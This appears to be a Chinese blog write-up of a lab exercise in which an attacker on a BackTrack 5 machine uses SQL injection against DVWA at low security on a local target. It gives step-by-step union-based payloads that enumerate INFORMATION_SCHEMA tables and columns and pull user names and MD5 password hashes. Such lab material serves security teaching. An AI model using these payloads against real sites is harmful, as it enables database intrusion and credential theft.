bt5制作php木马,Bt5的sql注入实例

版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!

恰饭广告

任务描述:

了解sql注入方法P170

任务环境说明:

攻击机:BT5

靶机:WEB服务器

攻击机安装服务/工具1:firefox

攻击机安装服务/工具2:

攻击机安装服务/工具3:

攻击机安装服务/工具4:

实现步骤:

1.    修改安全防护级别,改成低级,并保存配置

Firefox浏览器打开dvwa后台登录地址(http://10.10.10.129/dvwa/login.php)

管理员账号和密码:admin/admin

639fed30e2cc17cfc51899b3dcf5e9e1.png

登录后台之后,对网站安全等级进行修改

14997393be10d69087b1d270ac29a374.png

a262dd7930c8dc96d1faa25cb4f5ca84.png

1e5978e01ae55fb1d0e839b333bab990.png

2.    实现图4-11的效果;

SQL注入,查看是否存在注入漏洞

bb9555693cf49c0e41179cd6fd365401.png

输入不正确字符“’”提交之后,出现以下提示信息则说明存在注入漏洞

923a37d09cf0bfb1af0da287274dcd8c.png

通过特殊编制的SQL语句进行查询,获取网站后台的所有用户及密码

b3b6fd151c0ada528ed2bda47d2139ec.png

输入特殊编制的SQL语句’ or 1=1 — ‘提交之后,获取信息如下:

3e8bad86ca5b9b3a11aa88576834bcc3.png

3.    实现图4-12的效果;

通过特殊编制的SQL语句查询更多信息

ac3fb3f9d03f0228caf6943fedae647d.png

输入特殊字符串’ union select 1,2 — ‘提交之后,获取结果如下:

3220839553909ce46375075f010d60ec.png

注意:提示说明该网站的数据表存在两列

4.    实现图4-13的效果;

输入SQL语句查询数据库更多信息’ union select 1, table_name from INFORMATION_SCHEMA.tables — ‘

78d15f36f30081d71ed0d1ad36077530.png

检索INFORMATION_SCHEMA的结果如下:

e2b98b8c2e1d4f06aeadcca01cba42cf.png

注意:判断guestbook和users为网站所使用的数据表

5.    实现图4-14的效果;

输入SQL语句’ UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = ‘users’  — ‘  列出users表的内容

5ab43eba228ea2c2cbcfc10790b25f18.png

列出users表的所有内容以后,查询到users表存在password列(密码内容)

87ca3545ab2ee6d7aaff50806b2e87dc.png

输入SQL语句’ UNION SELECT NULL, password from users — ‘列出password列的密码内容(密码为MD5值,需要转换一下)

e658a266afbda4dc19bd72ed76b9536a.png

6.    实现图4-15的效果;

使用concat函数将所有信息列出来

输入SQL语句’ UNION SELECT password, concat (first_name, ‘ ‘ , last_name, ‘ ‘ , user) from users —

60d3d4413fad7b6f1e7e5b87d487187e.png

结果如下:

d79eebea6e32967fb9433673e9dcc4d0.png

让我恰个饭吧.ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信

恰饭广告

b2fa10417bcbd2c397d3c42ce544672e.gif

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值